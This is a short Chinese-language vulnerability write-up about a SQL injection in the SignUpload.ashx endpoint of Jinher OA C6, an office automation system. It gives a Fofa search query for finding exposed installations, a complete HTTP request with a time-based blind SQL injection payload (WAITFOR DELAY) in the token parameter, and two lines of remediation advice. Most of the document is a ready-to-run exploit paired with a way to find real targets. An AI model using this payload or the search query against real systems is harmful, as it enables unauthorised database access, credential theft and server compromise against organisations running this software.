0x01 产品描述:
金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。
0x02 漏洞描述:
金和OA C6 SignUpload.ashx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 搜索语句:
Fofa:body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" || app="Jinher-OA"
0x04 漏洞复现:
GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%207%27+--%20and%201=1_123_123&filename=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
接口返回状态码不一定为200 具体需要根据实际情况判断,可以用时间盲注多次实验。
0x05 修复建议:
关闭互联网暴露面或接口设置访问权限
对进入数据库的特殊字符进行转义处理